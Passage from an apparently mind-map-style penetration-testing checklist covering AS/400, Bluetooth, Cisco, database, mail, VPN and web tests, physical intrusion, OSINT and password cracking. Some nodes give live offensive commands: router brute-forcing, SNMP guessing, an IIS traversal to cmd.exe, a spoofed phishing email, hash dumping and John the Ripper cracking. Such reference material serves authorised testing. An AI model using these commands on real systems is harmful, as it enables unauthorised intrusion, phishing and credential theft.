20.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
20.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
20.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
20.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
20.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
20.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
20.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
20.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
20.1.3.2. Access with Work Station Gateway
20.1.3.2.1. http://target:5061/WSG
20.1.3.2.2. Default AS/400 accounts.
20.1.3.3. Network attacks (next release)
20.1.3.3.1. DB2
20.1.3.3.2. QSHELL
20.1.3.3.3. Hijacking Terminals
20.1.3.3.4. Trojan attacks
20.1.3.3.5. Hacking from AS/400
20.2. Local
20.2.1. System Value Security
20.2.1.1. Untitled
20.2.1.1.1. Untitled
20.2.1.2. Untitled
20.2.1.2.1. Untitled
20.2.1.3. Untitled
20.2.1.3.1. Untitled
20.2.1.4. Untitled
20.2.1.4.1. Recommended value is 30
20.2.2. Password Policy
20.2.2.1. Untitled
20.2.2.1.1. Untitled
20.2.2.1.2. Untitled
20.2.2.2. Untitled
20.2.2.2.1. Untitled
20.2.2.3. Untitled
20.2.2.3.1. Untitled
20.2.2.4. Untitled
20.2.2.4.1. Untitled
20.2.2.5. Untitled
20.2.3. Audit level
20.2.3.1. Untitled
20.2.3.1.1. Recommended value is *SECURITY
20.2.4. Documentation
20.2.4.1. Users class
20.2.4.1.1. Untitled
20.2.4.2. System Audit Settings
20.2.4.2.1. Untitled
20.2.4.3. Special Authorities Definitions
20.2.4.3.1. Untitled
21. Bluetooth Specific Testing
21.1. Bluescanner
21.2. Bluesweep
21.3. btscanner
21.4. Redfang
21.5. Blueprint
21.6. Bluesnarfer
21.7. Bluebugger
21.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
21.8. Blueserial
21.9. Bloover
21.10. Bluesniff
21.11. Exploit Frameworks
21.11.1. BlueMaho
21.11.1.1. Untitled
21.12. Resources
21.12.1. URL's
21.12.1.1. BlueStumbler.org
21.12.1.2. Bluejackq.com
21.12.1.3. Bluejacking.com
21.12.1.4. Bluejackers
21.12.1.5. bluetooth-pentest
21.12.1.6. ibluejackedyou.com
21.12.1.7. Trifinite
21.12.2. Vulnerability Information
21.12.2.1. Common Vulnerabilities and Exploits (CVE)
21.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
21.12.3. White Papers
21.12.3.1. Bluesnarfing
22. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
23. Cisco Specific Testing
23.1. Methodology
23.1.1. Scan & Fingerprint.
23.1.1.1. Untitled
23.1.1.2. Untitled
23.1.1.3. If SNMP is active, then community string guessing should be performed.
23.1.2. Credentials Guessing.
23.1.2.1. Untitled
23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
23.1.3. Connect
23.1.3.1. Untitled
23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
23.1.4. Check for bugs
23.1.4.1. Untitled
23.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
23.1.5. Further your attack
23.1.5.1. Untitled
23.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
23.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
23.1.5.2. Untitled
23.1.5.2.1. #> access-list 100 permit ip <IP> any
23.2. Scan & Fingerprint.
23.2.1. Port Scanning
23.2.1.1. nmap
23.2.1.1.1. Untitled
23.2.1.2. Other tools
23.2.1.2.1. Untitled
23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
23.2.2. Fingerprinting
23.2.2.1. Untitled
23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
23.2.2.2. Untitled
23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
23.2.2.2.2. Untitled
23.3. Password Guessing.
23.3.1. Untitled
23.3.1.1. ./CAT -h <IP> -a password.wordlist
23.3.1.2. Untitled
23.3.2. Untitled
23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
23.3.2.2. Untitled
23.3.3. Untitled
23.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
23.3.3.2. Untitled
23.4. SNMP Attacks.
23.4.1. Untitled
23.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
23.4.1.2. Untitled
23.4.2. Untitled
23.4.2.1. onesixytone -c SNMP.wordlist <IP>
23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
23.4.3. Untitled
23.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
23.4.3.2. Untitled
23.5. Connecting.
23.5.1. Telnet
23.5.1.1. Untitled
23.5.1.1.1. telnet <IP>
23.5.1.1.2. Sample Banners
23.5.2. SSH
23.5.3. Web Browser
23.5.3.1. Untitled
23.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
23.5.4. TFTP
23.5.4.1. Untitled
23.5.4.1.1. Untitled
23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
23.5.4.2. Untitled
23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
23.5.4.2.3. Creating backdoors in Cisco IOS using TCL
23.6. Known Bugs.
23.6.1. Attack Tools
23.6.1.1. Untitled
23.6.1.1.1. Untitled
23.6.1.2. Untitled
23.6.1.2.1. Web browse to the Cisco device: http://<IP>
23.6.1.2.2. Untitled
23.6.1.2.3. Untitled
23.6.1.2.4. Untitled
23.6.1.3. Untitled
23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
23.6.2. Common Vulnerabilities and Exploits (CVE) Information
23.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
23.7. Configuration Files.
23.7.1. Untitled
23.7.1.1. Configuration files explained
23.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
23.7.1.1.2. Untitled
23.7.1.1.3. Untitled
23.7.1.1.4. Password Encryption Utilised
23.7.1.1.5. Untitled
23.7.1.2. Configuration Testing Tools
23.7.1.2.1. Nipper
23.7.1.2.2. fwauto (Beta)
23.8. References.
23.8.1. Cisco IOS Exploitation Techniques
24. Server Specific Tests
24.1. Databases
24.1.1. Direct Access Interrogation
24.1.1.1. MS SQL Server
24.1.1.1.1. Ports
24.1.1.1.2. Version
24.1.1.1.3. osql
24.1.1.2. Oracle
24.1.1.2.1. Ports
24.1.1.2.2. TNS Listener
24.1.1.2.3. SQL Plus
24.1.1.2.4. Default Account/Passwords
24.1.1.2.5. Default SID's
24.1.1.3. MySQL
24.1.1.3.1. Ports
24.1.1.3.2. Version
24.1.1.3.3. Users/Passwords
24.1.1.4. DB2
24.1.1.5. Informix
24.1.1.6. Sybase
24.1.1.7. Other
24.1.2. Scans
24.1.2.1. Default Ports
24.1.2.2. Non-Default Ports
24.1.2.3. Instance Names
24.1.2.4. Versions
24.1.3. Password Attacks
24.1.3.1. Sniffed Passwords
24.1.3.1.1. Cracked Passwords
24.1.3.1.2. Hashes
24.1.3.2. Direct Access Guesses
24.1.4. Vulnerability Assessment
24.1.4.1. Automated
24.1.4.1.1. Reports
24.1.4.1.2. Vulnerabilities
24.1.4.2. Manual
24.1.4.2.1. Patch Levels
24.1.4.2.2. Confirmed Vulnerabilities
24.2. Mail
24.2.1. Scans
24.2.2. Fingerprint
24.2.2.1. Manual
24.2.2.2. Automated
24.2.3. Spoofable
24.2.3.1. Telnet spoof
24.2.3.1.1. telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: [192.168.1.1]X-Originating-Email: [XXXX@XXX.com]MIME-Version: 1.0To: <administrator@target.com>From: < XXXX@XXX.com >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target LtdXXXX@XXX.com.
24.2.4. Relays
24.3. VPN
24.3.1. Scanning
24.3.1.1. 500 UDP IPSEC
24.3.1.2. 1723 TCP PPTP
24.3.1.3. 443 TCP/SSL
24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
24.3.2. Fingerprinting
24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
24.3.3. PSK Crack
24.3.3.1. ikeprobe 80.75.68.27
24.3.3.2. sniff for responses with C&A or ikecrack
24.4. Web
24.4.1. Vulnerability Assessment
24.4.1.1. Automated
24.4.1.1.1. Reports
24.4.1.1.2. Vulnerabilities
24.4.1.2. Manual
24.4.1.2.1. Patch Levels
24.4.1.2.2. Confirmed Vulnerabilities
24.4.2. Permissions
24.4.2.1. PUT /test.txt HTTP/1.0
24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
24.4.3. Scans
24.4.4. Fingerprinting
24.4.4.1. Other
24.4.4.2. HTTP
24.4.4.2.1. Commands
24.4.4.2.2. Modules
24.4.4.2.3. File Extensions
24.4.4.3. HTTPS
24.4.4.3.1. Commands
24.4.4.3.2. Commands
24.4.4.3.3. File Extensions
24.4.5. Directory Traversal
24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
25. http://secunia.com/advisories/search/?search=citrix
26. Physical Security
26.1. Building Security
26.1.1. Meeting Rooms
26.1.1.1. Check for active network jacks.
26.1.1.2. Check for any information in room.
26.1.2. Lobby
26.1.2.1. Check for active network jacks.
26.1.2.2. Does receptionist/guard leave lobby?
26.1.2.3. Accessbile printers? Print test page.
26.1.2.4. Obtain phone/personnel listing.
26.1.3. Communal Areas
26.1.3.1. Check for active network jacks.
26.1.3.2. Check for any information in room.
26.1.3.3. Listen for employee conversations.
26.1.4. Room Security
26.1.4.1. Resistance of lock to picking.
26.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?
26.1.4.2. Ceiling access areas.
26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
26.1.5. Windows
26.1.5.1. Check windows/doors for visible intruderalarm sensors.
26.1.5.2. Check visible areas for sensitive information.
26.1.5.3. Can you video users logging on?
26.2. Perimeter Security
26.2.1. Fence Security
26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
26.2.2. Exterior Doors
26.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.
26.2.3. Guards
26.2.3.1. Patrol Routines
26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
26.2.3.2. Communications
26.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.
26.3. Entry Points
26.3.1. Guarded Doors
26.3.1.1. Piggybacking
26.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.
26.3.1.2. Fake ID
26.3.1.2.1. Attempt to use fake ID to gain access.
26.3.1.3. Access Methods
26.3.1.3.1. Test 'out of hours' entry methods
26.3.2. Unguarded Doors
26.3.2.1. Identify all unguardedentry points.
26.3.2.1.1. Are doors secured?
26.3.2.1.2. Check locks for resistance to lock picking.
26.3.3. Windows
26.3.3.1. Check windows/doors for visible intruderalarm sensors.
26.3.3.1.1. Attempt to bypass sensors.
26.4. Office Waste
26.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc
27. Final Report - template
28. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
28.1. Untitled
28.1.1. Authoratitive Bodies
28.1.1.1. IANA - Internet Assigned Numbers Authority
28.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
28.1.1.3. NRO - Number Resource Organisation
28.1.1.4. RIR - Regional Internet Registry
28.1.1.4.1. AFRINIC - African Network Information Centre
28.1.1.4.2. APNIC - Asia Pacific Network Information Centre
28.1.1.4.3. ARIN - American Registry for Internet Numbers
28.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
28.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
28.1.2. Websites
28.1.2.1. Central Ops
28.1.2.1.1. Domain Dossier
28.1.2.1.2. Email Dossier
28.1.2.2. DNS Stuff
28.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
28.1.2.3. Fixed Orbit
28.1.2.3.1. Autonomous System lookups and other online tools available.
28.1.2.4. Geektools
28.1.2.5. IP2Location
28.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
28.1.2.6. Kartoo
28.1.2.6.1. Metasearch engine that visually presents its results.
28.1.2.7. MyIPNeighbors.com
28.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
28.1.2.8. My-IP-Neighbors.com
28.1.2.8.1. Excellent site that can be used if the above is down
28.1.2.9. myipneighbors.net
28.1.2.10. Netcraft
28.1.2.10.1. Online search tool allowing queries for host information.
28.1.2.11. Passive DNS Replication
28.1.2.11.1. Finds shared domains based on supplied IP addresses
28.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
28.1.2.12. Robtex
28.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
28.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
28.1.2.13. Traceroute.org
28.1.2.13.1. Website listing a large number links to online traceroute resources.
28.1.2.14. Wayback Machine
28.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
28.1.2.15. Whois.net
28.1.3. Tools
28.1.3.1. Cheops-ng
28.1.3.2. Country whois
28.1.3.3. Domain Research Tool
28.1.3.4. Firefox Plugins
28.1.3.4.1. AS Number
28.1.3.4.2. Shazou
28.1.3.4.3. Firecat Suite
28.1.3.5. Gnetutil
28.1.3.6. Goolag Scanner
28.1.3.7. Greenwich
28.1.3.8. Maltego
28.1.3.9. GTWhois
28.1.3.10. Sam Spade
28.1.3.11. Smart whois
28.1.3.12. SpiderFoot
28.2. Internet Search
28.2.1. General Information
28.2.1.1. Web Investigator
28.2.1.2. Tracesmart
28.2.1.3. Friends Reunited
28.2.1.4. Ebay - profiles etc.
28.2.2. Financial
28.2.2.1. EDGAR - Company information, including real-time filings. US
28.2.2.2. Google Finance - General Finance Portal
28.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
28.2.2.4. Companies House UK
28.2.2.5. Land Registry UK
28.2.3. Phone book/ Electoral Role Information
28.2.3.1. 123people
28.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
28.2.3.2. 192.com
28.2.3.2.1. Electoral Role Search. UK
28.2.3.3. 411
28.2.3.3.1. Online White Pages and Yellow Pages. US
28.2.3.4. Untitled
28.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
28.2.3.5. BT.com. UK
28.2.3.5.1. Residential
28.2.3.5.2. Business
28.2.3.6. Pipl
28.2.3.6.1. Untitled
28.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
28.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
28.2.3.7. Spokeo
28.2.3.7.1. http://www.spokeo.com/user?q=domain_name
28.2.3.7.2. http://www.spokeo.com/user?q=email_address
28.2.3.8. Yasni
28.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
28.2.3.9. Zabasearch
28.2.3.9.1. People Search Engine. US
28.2.4. Generic Web Searching
28.2.4.1. Code Search
28.2.4.2. Forum Entries
28.2.4.3. Google Hacking Database
28.2.4.4. Google
28.2.4.4.1. Email Addresses
28.2.4.4.2. Contact Details
28.2.4.5. Newsgroups/forums
28.2.4.6. Blog Search
28.2.4.6.1. Yammer
28.2.4.6.2. Google Blog Search
28.2.4.6.3. Technorati
28.2.4.6.4. Jaiku
28.2.4.6.5. Present.ly
28.2.4.6.6. Twitter Network Browser
28.2.4.7. Search Engine Comparison/ Aggregator Sites
28.2.4.7.1. Clusty
28.2.4.7.2. Grokker
28.2.4.7.3. Zuula
28.2.4.7.4. Exalead
28.2.4.7.5. Delicious
28.2.5. Metadata Search
28.2.5.1. Untitled
28.2.5.1.1. MetaData Visualisation Sites
28.2.5.1.2. Tools
28.2.5.1.3. Wikipedia Metadata Search
28.2.6. Social/ Business Networks
28.2.6.1. Untitled
28.2.6.1.1. Africa
28.2.6.1.2. Australia
28.2.6.1.3. Belgium
28.2.6.1.4. Holland
28.2.6.1.5. Hungary
28.2.6.1.6. Iran
28.2.6.1.7. Japan
28.2.6.1.8. Korea
28.2.6.1.9. Poland
28.2.6.1.10. Russia
28.2.6.1.11. Sweden
28.2.6.1.12. UK
28.2.6.1.13. US
28.2.6.1.14. Assorted
28.2.7. Resources
28.2.7.1. OSINT
28.2.7.2. International Directory of Search Engines
28.3. DNS Record Retrieval from publically available servers
28.3.1. Types of Information Records
28.3.1.1. SOA Records - Indicates the server that has authority for the domain.
28.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
28.3.1.3. NS Records - List of a host’s or domain’s name server(s).
28.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
28.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
28.3.1.6. SRV Records - Service location record.
28.3.1.7. HINFO Records - Host information record with CPU type and operating system.
28.3.1.8. TXT Records - Generic text record.
28.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
28.3.1.10. RP - Responsible person for the domain.
28.3.2. Database Settings
28.3.2.1. Version.bind
28.3.2.2. Serial
28.3.2.3. Refresh
28.3.2.4. Retry
28.3.2.5. Expiry
28.3.2.6. Minimum
28.3.3. Sub Domains
28.3.4. Internal IP ranges
28.3.4.1. Reverse DNS for IP Range
28.3.5. Zone Transfer
28.4. Social Engineering
28.4.1. Remote
28.4.1.1. Phone
28.4.1.1.1. Scenarios
28.4.1.1.2. Results
28.4.1.1.3. Contact Details
28.4.1.2. Email
28.4.1.2.1. Scenarios
28.4.1.2.2. Software
28.4.1.2.3. Results
28.4.1.2.4. Contact Details
28.4.1.3. Other
28.4.2. Local
28.4.2.1. Personas
28.4.2.1.1. Name
28.4.2.1.2. Phone
28.4.2.1.3. Email
28.4.2.1.4. Business Cards
28.4.2.2. Contact Details
28.4.2.2.1. Name
28.4.2.2.2. Phone number
28.4.2.2.3. Email
28.4.2.2.4. Room number
28.4.2.2.5. Department
28.4.2.2.6. Role
28.4.2.3. Scenarios
28.4.2.3.1. New IT employee
28.4.2.3.2. Fire Inspector
28.4.2.4. Results
28.4.2.5. Maps
28.4.2.5.1. Satalitte Imagery
28.4.2.5.2. Building layouts
28.4.2.6. Other
28.5. Dumpster Diving
28.5.1. Rubbish Bins
28.5.2. Contract Waste Removal
28.5.3. Ebay ex-stock sales i.e. HDD
28.6. Web Site copy
28.6.1. htttrack
28.6.2. teleport pro
28.6.3. Black Widow
29. Password cracking
29.1. Rainbow crack
29.1.1. ophcrack
29.1.2. rainbow tables
29.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
29.2. Ophcrack
29.3. Cain & Abel
29.4. John the Ripper
29.4.1. ./unshadow passwd shadow > file_to_crack
29.4.2. ./john -single file_to_crack
29.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
29.4.4. ./john -show file_to_crack
29.4.5. ./john --incremental:All file_to_crack
29.5. fgdump
29.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
29.6. pwdump6
29.7. medusa
29.8. LCP
29.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
29.9.1. Domain credentials
29.9.2. Sniffing
29.9.3. pwdump import
29.9.4. sam import
29.10. aiocracker
29.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list